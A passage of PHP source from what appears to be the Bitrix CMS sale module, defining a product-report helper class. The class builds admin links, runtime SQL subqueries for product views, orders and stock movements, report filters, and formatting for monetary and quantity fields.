if ($field->getEntity()->getName() == 'User')
{
if (in_array(
$elem['name'],
array(
'FUSER.USER.EMAIL',
'ORDER.EMP_CANCELED_BY.EMAIL',
'ORDER.EMP_STATUS_BY.EMAIL',
'ORDER.Payment:ORDER.EMP_PAID_BY.EMAIL',
'ORDER.Payment:ORDER.RESPONSIBLE_BY.EMAIL',
'ORDER.Shipment:REPS_ORDER.EMP_ALLOW_DELIVERY_BY.EMAIL',
'ORDER.Shipment:REPS_ORDER.EMP_DEDUCTED_BY.EMAIL',
'ORDER.Shipment:REPS_ORDER.RESPONSIBLE_BY.EMAIL'
),
true))
{
$href = array('pattern' => 'mailto:#'.$elem['name'].'#');
}
else if (in_array(
$elem['name'],
array(
'FUSER.USER.SHORT_NAME',
'ORDER.EMP_CANCELED_BY.SHORT_NAME',
'ORDER.EMP_STATUS_BY.SHORT_NAME',
'ORDER.Payment:ORDER.EMP_PAID_BY.SHORT_NAME',
'ORDER.Payment:ORDER.RESPONSIBLE_BY.SHORT_NAME',
'ORDER.Shipment:REPS_ORDER.EMP_ALLOW_DELIVERY_BY.SHORT_NAME',
'ORDER.Shipment:REPS_ORDER.EMP_DEDUCTED_BY.SHORT_NAME',
'ORDER.Shipment:REPS_ORDER.RESPONSIBLE_BY.SHORT_NAME'
),
true))
{
$userDef = substr($elem['name'], 0, -11);
$href = array('pattern' => '/bitrix/admin/sale_buyers_profile.php?USER_ID=#'.$userDef.'.ID#&lang='.LANG);
}
}
elseif ($field->getEntity()->getName() == 'Basket')
{
if ($elem['name'] == 'NAME' || $elem['name'] == 'NAME_WITH_IDENT')
{
$href = array('pattern' => '/bitrix/admin/cat_product_edit.php?IBLOCK_ID='.
'#PRODUCT.IBLOCK.IBLOCK.ID#&type=#PRODUCT.IBLOCK.IBLOCK.IBLOCK_TYPE_ID#&ID='.
'#PRODUCT_ID#&lang='.LANG.'&WF=Y');
}
elseif ($elem['name'] == 'ORDER_ID')
{
$href = array('pattern' => '/bitrix/admin/sale_order_view.php?ID=#ORDER_ID#&lang='.LANG);
}
}
else if ($field->getEntity()->getName() == 'Order')
{
if ($elem['name'] === 'ORDER.ID')
{
$href = array('pattern' => '/bitrix/admin/sale_order_view.php?ID=#ORDER.ID#&lang='.LANG);
}
}
else if ($field->getEntity()->getName() === 'Payment')
{
if ($elem['name'] === 'ORDER.Payment:ORDER.ID')
{
$href = array('pattern' => '/bitrix/admin/sale_order_payment_edit.php?order_id=#ORDER.Payment:ORDER.ORDER_ID#&payment_id=#ORDER.Payment:ORDER.ID#&lang='.LANG);
}
else if ($elem['name'] === 'ORDER.Payment:ORDER.PAY_SYSTEM_ID'
|| $elem['name'] === 'ORDER.Payment:ORDER.PAY_SYSTEM_NAME')
{
$href = array('pattern' => '/bitrix/admin/sale_pay_system_edit.php?ID=#ORDER.Payment:ORDER.PAY_SYSTEM_ID#&lang='.LANG);
}
}
else if ($field->getEntity()->getName() === 'Shipment')
{
if ($elem['name'] === 'ORDER.Shipment:REPS_ORDER.ID')
{
$href = array('pattern' => '/bitrix/admin/sale_order_shipment_edit.php?order_id=#ORDER.Shipment:REPS_ORDER.ORDER_ID#&shipment_id=#ORDER.Shipment:REPS_ORDER.ID#&lang='.LANG);
}
else if ($elem['name'] === 'ORDER.Shipment:REPS_ORDER.DELIVERY_ID'
|| $elem['name'] === 'ORDER.Shipment:REPS_ORDER.DELIVERY_NAME')
{
$href = array('pattern' => '/bitrix/admin/sale_delivery_service_edit.php?ID=#ORDER.Shipment:REPS_ORDER.DELIVERY_ID#&lang='.LANG);
}
}
}
return $href;
}
}
class CSaleReportSaleProductHelper extends CBaseSaleReportHelper
{
private static $customProductFilter = 'all';
private static $monetaryFields = array(
'PRICE_IN_SITE_CURRENCY',
'SUMMARY_PRICE_IN_SITE_CURRENCY',
'PURCHASING_PRICE_IN_SITE_CURRENCY'
);
private static $goodsQuantityFields = array(
'QUANTITY',
'SALED_PRODUCTS_IN_PERIOD_BY_SHOP',
'ARRIVED_PRODUCTS_IN_PERIOD_BY_SHOP',
'ARRIVED_PRODUCTS_IN_PERIOD_BY_STORE',
'EXPENSE_PRODUCTS_IN_PERIOD_BY_STORE',
'STORE_PRODUCT_SALE_PRODUCT_AMOUNT'
);
private static $withoutTotalFields = array(
'CONVERSION',
'PRODUCT_STORE_ID'
);
private static $userNotAuthNameFields = array();
private static $currentIblockFilter = array('value' => null, 'compare' => null);
public static function setCustomProductFilter($strFilterValue)
{
self::$customProductFilter = $strFilterValue;
}
public static function enablePriceTypesColumns($bUsePriceTypesColumns)
{
self::$bUsePriceTypesColumns = $bUsePriceTypesColumns;
}
public static function getCustomProductFilter()
{
return self::$customProductFilter;
}
public static function getEntityName()
{
return 'Bitrix\Sale\Internals\Product';
}
public static function getOwnerId()
{
return SALE_REPORT_OWNER_ID.'_SaleProduct';
}
public static function getColumnList()
{
IncludeModuleLangFile(__FILE__);
return array(
'ID',
'QUANTITY',
'NAME',
'NAME_WITH_IDENT',
'ACTIVE',
'WEIGHT_IN_SITE_UNITS',
'PRICE_IN_SITE_CURRENCY',
'PURCHASING_PRICE_IN_SITE_CURRENCY',
'SUMMARY_PRICE_IN_SITE_CURRENCY',
'VIEWS_IN_PERIOD_BY_SHOP',
'SUBSCRIPTIONS_IN_PERIOD_BY_SHOP',
'ORDERS_IN_PERIOD_BY_SHOP',
'CONVERSION',
'SALED_PRODUCTS_IN_PERIOD_BY_SHOP',
'ARRIVED_PRODUCTS_IN_PERIOD_BY_SHOP',
'ARRIVED_PRODUCTS_IN_PERIOD_BY_STORE',
'EXPENSE_PRODUCTS_IN_PERIOD_BY_STORE',
'IBLOCK.SectionElement:IBLOCK_ELEMENT.IBLOCK_SECTION' => array(
'ID',
'NAME'
),
'StoreProduct:SALE_PRODUCT' => array(
'STORE.ID',
'STORE.TITLE',
'STORE.ADDRESS',
'STORE.DESCRIPTION',
'STORE.PHONE',
'STORE.SCHEDULE',
'AMOUNT'
)
);
}
public static function setRuntimeFields(\Bitrix\Main\Entity\Base $entity, $sqlTimeInterval)
{
global $DB;
$entity->addField(array(
'data_type' => 'integer',
'expression' => array(
'(SELECT SUM(1) FROM b_catalog_product, b_catalog_viewed_product WHERE %s = b_catalog_viewed_product.ELEMENT_ID
AND b_catalog_product.ID = b_catalog_viewed_product.ELEMENT_ID
AND b_catalog_viewed_product.DATE_VISIT '.$sqlTimeInterval.' AND b_catalog_viewed_product.SITE_ID = \''.$DB->ForSql(self::getDefaultSiteId()).'\')', 'ID'
)
), 'VIEWS_IN_PERIOD_BY_SHOP');
$entity->addField(array(
'data_type' => 'integer',
'expression' => array(
'(SELECT SUM(1) FROM b_catalog_subscribe WHERE b_catalog_subscribe.ITEM_ID = %s
AND b_catalog_subscribe.DATE_FROM '.$sqlTimeInterval.'
AND b_catalog_subscribe.SITE_ID = \''.$DB->ForSql(self::getDefaultSiteId()).'\')', 'ID'
)
), 'SUBSCRIPTIONS_IN_PERIOD_BY_SHOP');
$entity->addField(array(
'data_type' => 'integer',
'expression' => array(
'(SELECT COUNT(DISTINCT b_sale_order.ID)
FROM b_catalog_product
INNER JOIN b_sale_basket ON b_catalog_product.ID = b_sale_basket.PRODUCT_ID
INNER JOIN b_sale_order ON b_sale_basket.ORDER_ID = b_sale_order.ID
WHERE
b_catalog_product.ID = %s
AND b_sale_order.PAYED = \'Y\'
AND b_sale_order.DATE_INSERT '.$sqlTimeInterval.'
AND b_sale_basket.LID = \''.$DB->ForSql(self::getDefaultSiteId()).'\')', 'ID'
)
), 'ORDERS_IN_PERIOD_BY_SHOP');
$entity->addField(array(
'data_type' => 'integer',
'expression' => array(
$DB->isNull('(SELECT SUM(b_sale_basket.QUANTITY)
FROM b_sale_basket
INNER JOIN b_sale_order ON b_sale_basket.ORDER_ID = b_sale_order.ID
WHERE b_sale_basket.PRODUCT_ID = %s
AND b_sale_order.PAYED = \'Y\'
AND b_sale_order.DEDUCTED = \'Y\'
AND b_sale_order.DATE_INSERT '.$sqlTimeInterval.'
AND b_sale_basket.LID = \''.$DB->ForSql(self::getDefaultSiteId()).'\')', 0).'+'.
$DB->isNull('(SELECT SUM(b_catalog_docs_element.AMOUNT)
FROM b_catalog_store_docs
INNER JOIN b_catalog_docs_element on b_catalog_store_docs.ID = b_catalog_docs_element.DOC_ID
WHERE b_catalog_store_docs.DOC_TYPE = \'D\'
AND b_catalog_store_docs.STATUS = \'Y\'
AND b_catalog_store_docs.DATE_DOCUMENT '.$sqlTimeInterval.'
AND b_catalog_docs_element.ELEMENT_ID = %s)', 0),
'ID', 'ID'
)
), 'SALED_PRODUCTS_IN_PERIOD_BY_SHOP');
$entity->addField(array(
'data_type' => 'float',
'expression' => array(
'(SELECT SUM(b_catalog_docs_element.AMOUNT)
FROM b_catalog_store_docs
INNER JOIN b_catalog_docs_element on b_catalog_store_docs.ID = b_catalog_docs_element.DOC_ID
WHERE b_catalog_store_docs.DOC_TYPE in (\'A\', \'R\')
AND b_catalog_store_docs.STATUS = \'Y\'
AND b_catalog_store_docs.DATE_DOCUMENT '.$sqlTimeInterval.'
AND b_catalog_docs_element.ELEMENT_ID = %s)', 'ID'
)
), 'ARRIVED_PRODUCTS_IN_PERIOD_BY_SHOP');
$entity->addField(array(
'data_type' => 'float',
'expression' => array(
'(SELECT SUM(b_catalog_docs_element.AMOUNT)
FROM b_catalog_store_docs
INNER JOIN b_catalog_docs_element on b_catalog_store_docs.ID = b_catalog_docs_element.DOC_ID
WHERE b_catalog_store_docs.DOC_TYPE in (\'A\', \'M\', \'R\')
AND b_catalog_store_docs.STATUS = \'Y\'
AND b_catalog_store_docs.DATE_DOCUMENT '.$sqlTimeInterval.'
AND b_catalog_docs_element.STORE_TO = %s
AND b_catalog_docs_element.ELEMENT_ID = %s)', 'StoreProduct:SALE_PRODUCT.STORE_ID', 'ID'
)
), 'ARRIVED_PRODUCTS_IN_PERIOD_BY_STORE');
$entity->addField(array(
'data_type' => 'integer',
'expression' => array(
$DB->isNull('(SELECT SUM(b_sale_store_barcode.QUANTITY)
FROM b_sale_store_barcode
INNER JOIN b_sale_basket ON b_sale_store_barcode.BASKET_ID = b_sale_basket.ID
INNER JOIN b_sale_order ON b_sale_basket.ORDER_ID = b_sale_order.ID
WHERE b_sale_store_barcode.STORE_ID = %s
AND b_sale_basket.PRODUCT_ID = %s
AND b_sale_order.PAYED = \'Y\'
AND b_sale_order.DEDUCTED = \'Y\'
AND b_sale_order.DATE_INSERT '.$sqlTimeInterval.'
AND b_sale_basket.LID = \''.$DB->ForSql(self::getDefaultSiteId()).'\')', 0).'+'.
$DB->isNull('(SELECT SUM(b_catalog_docs_element.AMOUNT)
FROM b_catalog_store_docs
INNER JOIN b_catalog_docs_element on b_catalog_store_docs.ID = b_catalog_docs_element.DOC_ID
WHERE b_catalog_store_docs.DOC_TYPE in (\'M\', \'D\')
AND b_catalog_store_docs.STATUS = \'Y\'
AND b_catalog_store_docs.DATE_DOCUMENT '.$sqlTimeInterval.'
AND b_catalog_docs_element.STORE_FROM = %s
AND b_catalog_docs_element.ELEMENT_ID = %s)', 0),
'StoreProduct:SALE_PRODUCT.STORE_ID', 'ID', 'StoreProduct:SALE_PRODUCT.STORE_ID', 'ID'
)
), 'EXPENSE_PRODUCTS_IN_PERIOD_BY_STORE');
$entity->addField(array(
'data_type' => 'float',
'expression' => array(
'100 * CASE WHEN %s IS NULL OR %s = 0 THEN NULL ELSE %s / %s END',
'VIEWS_IN_PERIOD_BY_SHOP', 'VIEWS_IN_PERIOD_BY_SHOP', 'ORDERS_IN_PERIOD_BY_SHOP', 'VIEWS_IN_PERIOD_BY_SHOP'
)
), 'CONVERSION');
}
public static function getDefaultColumns()
{
return array(
array('name' => 'ID'),
array('name' => 'NAME')
);
}
public static function getCompareVariations()
{
return array_merge(parent::getCompareVariations(), array(
'IBLOCK.SectionElement:IBLOCK_ELEMENT.IBLOCK_SECTION' => array(
'EQUAL'/*,
'NOT_EQUAL'*/
),
'StoreProduct:SALE_PRODUCT' => array(
'EQUAL'
)
));
}
public static function getCalcVariations()
{
return array_merge(parent::getCalcVariations(), array(
'IBLOCK.SectionElement:IBLOCK_ELEMENT.IBLOCK_SECTION.ID' => array(
'COUNT_DISTINCT',
'GROUP_CONCAT'
),
'IBLOCK.SectionElement:IBLOCK_ELEMENT.IBLOCK_SECTION.NAME' => array(
'COUNT_DISTINCT',
'GROUP_CONCAT'
),
'StoreProduct:SALE_PRODUCT.STORE.ID' => array(
'COUNT_DISTINCT',
'GROUP_CONCAT'
),
'StoreProduct:SALE_PRODUCT.STORE.TITLE' => array(
'COUNT_DISTINCT',
'GROUP_CONCAT'
)
));
}
public static function getPeriodFilter($date_from, $date_to)
{
global $DB;
$filter = array('LOGIC' => 'AND');
// Site filter
$filter[] = array(
'=IBLOCK.IBLOCK.Site:IBLOCK.SITE_ID' => $DB->ForSql(self::getDefaultSiteId())
);
// Custom Product filter
$customProductFilter = self::getCustomProductFilter();
if (!empty($customProductFilter))
{
if ($customProductFilter === 'avail') $strOperation = '>';
else if ($customProductFilter === 'not_avail') $strOperation = '<=';
else $strOperation = '';
if (!empty($strOperation)) $filter[] = array($strOperation.'QUANTITY' => '0');
}
return $filter;
}
public static function getEntityFilterPrimaryFieldName($fElem)
{
$res = 'ID';
if ($fElem['name'] === 'StoreProduct:SALE_PRODUCT')
{
$res = 'STORE_ID';
}
else
{
$res = parent::getEntityFilterPrimaryFieldName($fElem);
}
return $res;
}
public static function confirmFilterBackReferenceRewrite($fElem, $chain)
{
if ($fElem['name'] === 'StoreProduct:SALE_PRODUCT.STORE_ID')
{
return false;
}
return true;
}
public static function confirmSelectBackReferenceRewrite($elem, $chain)
{
if ($elem['name'] === 'StoreProduct:SALE_PRODUCT.STORE_ID')
{
return false;
}
return true;
}
public static function beforeFilterBackReferenceRewrite(&$filter, $viewColumns)
{
// Field for filtering category of the goods
$fieldName = 'IBLOCK.SectionElement:IBLOCK_ELEMENT.IBLOCK_SECTION.ID';
// <editor-fold defaultstate="collapsed" desc="Preparation of multiple filters">
foreach ($filter as $fId => &$fInfo)
{
foreach ($fInfo as $k => &$fElem)
{
if (is_array($fElem) && $fElem['type'] == 'field')
{
$columnName = '';
if (preg_match('/__COLUMN__(\d+)/', $fElem['name'], $match))
{
$num = $match[1];
$columnName = $viewColumns[$num]['fieldName'];
}
if ($fElem['name'] == $fieldName || $columnName == $fieldName)
{
$iblockFilterCompare = $fElem['compare'];
if ($iblockFilterCompare === 'EQUAL'/* || $iblockFilterCompare === 'NOT_EQUAL'*/)
{
$iblockFilterValue = array();
$arFilterValues = array();
if (is_array($fElem['value'])) $arFilterValues = $fElem['value'];
else $arFilterValues[] = $fElem['value'];
foreach ($arFilterValues as $l => $filterValue)
{
if (is_string($filterValue) && $filterValue[0] == 'c')
{
$iblockFilterValue[] = intval(substr($filterValue, 1));
// The filter on a section is deleted if the filter only according
// to the catalog is necessary
unset($arFilterValues[$l]);
}
else
{
$sections = array();
foreach (parent::$catalogSections as $sectKey => $sect)
{
if ($sectKey == $filterValue) $iblockFilterValue[] = intval($sect['catalog']['ID']);
if (in_array($filterValue, $sect['path'])) $sections[] = $sectKey;
}
$arFilterValues[$l] = $sections;
}
}
$l = count($arFilterValues);
if ($l === 0) unset($fInfo[$k]);
else if ($l === 1) $fInfo[$k]['value'] = reset($arFilterValues);
else
{
$newFilterValue = array();
foreach ($arFilterValues as $filterValue)
{
$newFilterValue = array_merge($newFilterValue, $filterValue);
}
$newFilterValue = array_unique($newFilterValue);
$fInfo[$k]['value'] = $newFilterValue;
}
$l = count($iblockFilterValue);
if ($l === 0) $iblockFilterValue = null;
else if ($l === 1) $iblockFilterValue = reset($iblockFilterValue);
else $iblockFilterValue = array_unique($iblockFilterValue);
self::$currentIblockFilter['value'] = $iblockFilterValue;
self::$currentIblockFilter['compare'] = $iblockFilterCompare;
}
}
// rewrite StoreProduct.STORE_ID
if ($fElem['name'] == 'StoreProduct:SALE_PRODUCT.STORE_ID')
{
$fElem['name'] = 'StoreProduct:SALE_PRODUCT.STORE_ID';
}
}
}
}
// </editor-fold>
}
public static function beforeViewDataQuery(&$select, &$filter, &$group, &$order, &$limit, &$options, &$runtime = null)
{
global $DB, $DBType;
if (function_exists('___dbCastIntToChar') !== true)
{
eval(
'function ___dbCastIntToChar($dbtype, $param)'.
'{'.
' $result = $param;'.
' if (ToLower($dbtype) === "mssql")'.
' {'.
' $result = "CAST(".$param." AS VARCHAR)";'.
' }'.
' return $result;'.
'}'
);
}
// Runtime fields
if (self::$bUsePriceTypesColumns)
{
foreach (self::$priceTypes as $id => $info)
{
if ($info['selected'] === true)
{
$fieldName = 'PRICE_TYPE_'.$id;
$runtime[$fieldName] = array(
'data_type' => 'string',
'expression' => array('
(SELECT '.$DB->Concat(___dbCastIntToChar($DBType,'b_catalog_price.PRICE'), '\' \'', 'b_catalog_price.CURRENCY').'
FROM b_catalog_price
LEFT JOIN b_catalog_group ON b_catalog_group.ID = b_catalog_price.CATALOG_GROUP_ID
WHERE b_catalog_price.PRODUCT_ID = %s
AND b_catalog_group.ID = '.$id.'
AND ( b_catalog_price.quantity_from <= 1 OR b_catalog_price.quantity_from IS NULL )
AND ( b_catalog_price.quantity_to >= 1 OR b_catalog_price.quantity_to IS NULL ) LIMIT 1)',
'ID'
),
'view_column' => array(
'humanTitle' => $info['name']
)
);
$select[$fieldName] = $fieldName;
}
}
}
if (self::$currentIblockFilter['value'])
{
$filter[] = array(
'LOGIC' => 'AND',
((self::$currentIblockFilter['compare'] === 'EQUAL') ? '=' : '!=').'IBLOCK.IBLOCK_ID' => self::$currentIblockFilter['value']
);
}
self::$currentIblockFilter['value'] = null;
self::$currentIblockFilter['compare'] = null;
}
/* remove it when PHP 5.3 available */
public static function formatResults(&$rows, &$columnInfo, $total)
{
foreach ($rows as &$row)
{
foreach ($row as $k => &$v)
{
if (!array_key_exists($k, $columnInfo))
{
continue;
}
$cInfo = &$columnInfo[$k];
if (is_array($v))
{
foreach ($v as &$subv)
{
self::formatResultValue($k, $subv, $row, $cInfo, $total);
}
}
else
{
self::formatResultValue($k, $v, $row, $cInfo, $total);
}
}
}
unset($row, $v, $subv);
}
/* \remove it */
// format result value in grouping mode
/*public static function formatResultGroupingValue($params)
{
$k = $params['k'];
$v = $params['v'];
$row = $params['row'];
$cInfo = $params['cInfo'];
static::formatResultValue($k, $v, $row, $cInfo, array());
}*/
public static function formatResultValue($k, &$v, &$row, &$cInfo, $total, &$customChartValue = null)
{
$dataType = self::getFieldDataType($cInfo['field']);
/** @var Bitrix\Main\Entity\Field[] $cInfo */
if ($dataType !== 'float' ) // skip base rounding
{
parent::formatResultValue($k, $v, $row, $cInfo, $total);
}
// Inserting zero in numerical fields with null value.
if (empty($v))
{
if (in_array($dataType, array('integer', 'float')))
{
$v = 0;
}
//else $v = ' ';
}
// Formatting of monetary fields.
foreach (self::$monetaryFields as $monField)
{
if (preg_match('/'.$monField.'$/', $k))
{
$v = self::calculateInReportCurrency($v);
$v = number_format(doubleval($v), 2, '.', ' ');
break;
}
}
// Formatting fields with goods quantity.
foreach (self::$goodsQuantityFields as $qField)
{
if (preg_match('/'.$qField.'$/', $k))
{
if (!empty($v) && !is_null($v) && $v != ' ')
{
if (self::$fDecimalQuant) $v = sprintf('%.3f', round($v,3));
else $v = sprintf('%d', round($v,0));
}
break;
}
}
// Formatting short name fields of buyers.
foreach (self::$userNotAuthNameFields as $uField)
{
if (preg_match('/'.$uField.'$/', $k))
{
if (empty($v) || is_null($v) || $v == ' ')
{
$v = GetMessage('SALE_REPORT_USER_NOT_AUTH');
}
break;
}
}
// runtime fields which align right
if (self::$bUsePriceTypesColumns)
{
if (strpos($k, 'PRICE_TYPE_') === 0 && is_numeric(substr($k, 11))) $cInfo['align'] = 'right';
}
// Formatting fields of price types
if (preg_match('/[A-Za-z_]*PRICE_TYPE_[0-9]+$/', $k) && !empty($v) && $v !== ' ')
{
$v = trim($v);
$spacePos = strpos(trim($v), ' ');
$v = number_format(doubleval(substr($v, 0, $spacePos)), 2, '.', ' ').substr($v, $spacePos);
}
}
public static function formatResultGroupingTotal($params)
{
$paramTotal = array('TOTAL_'.$params['k'] => &$params['v']);
$viewColumns = array($params['k'] => &$params['cInfo']);
$bFormatOnly = true;
static::formatResultsTotal($paramTotal, $viewColumns, $bFormatOnly);
}
public static function formatResultsTotal(&$total, &$columnInfo, &$bFormatOnly = null)
{
parent::formatResultsTotal($total, $columnInfo);
foreach ($total as $k => &$v)
{
// Formatting of monetary fields.
foreach (self::$monetaryFields as $monField)
{
if (preg_match('/'.$monField.'$/', $k))
{
if (!$bFormatOnly) $v = self::calculateInReportCurrency($v);
$v = number_format(doubleval($v), 2, '.', ' ');
break;
}
}
// Formatting fields with goods quantity.
foreach (self::$goodsQuantityFields as $qField)
{
if (preg_match('/'.$qField.'$/', $k))
{
if (!empty($v) && !is_null($v) && $v != ' ')
{
if (self::$fDecimalQuant) $v = sprintf('%.3f', round($v,3));
else $v = sprintf('%d', round($v,0));
}
break;
}
}
// Formatting fields without summary calculation.
foreach (self::$withoutTotalFields as $wtField)
{
if (preg_match('/TOTAL_'.$wtField.'$/', $k))
{
unset($total[$k]);
break;
}
}
// Formatting fields of price types
if (!$bFormatOnly)
{
if (preg_match('/[A-Za-z_]*PRICE_TYPE_[0-9]+$/', $k) && !empty($v) && $v !== ' ')
{
$v = trim($v);
$spacePos = strpos($v, ' ');
$v = number_format(doubleval(substr($v, 0, $spacePos)), 2, '.', ' ').substr($v, $spacePos);
}
}
}
}
public static function getDefaultElemHref($elem, $fList)
{
$href = '';
if (empty($elem['aggr']))
{
$field = $fList[$elem['name']];
if ($field->getEntity()->getName() == 'Product')
{
if ($elem['name'] == 'NAME')
{
$href = array('pattern' => '/bitrix/admin/cat_product_edit.php?IBLOCK_ID='.
'#IBLOCK.IBLOCK.ID#&type=#IBLOCK.IBLOCK.IBLOCK_TYPE_ID#&ID='.
'#ID#&lang='.LANG.'&WF=Y');
}
}
}
return $href;
}
}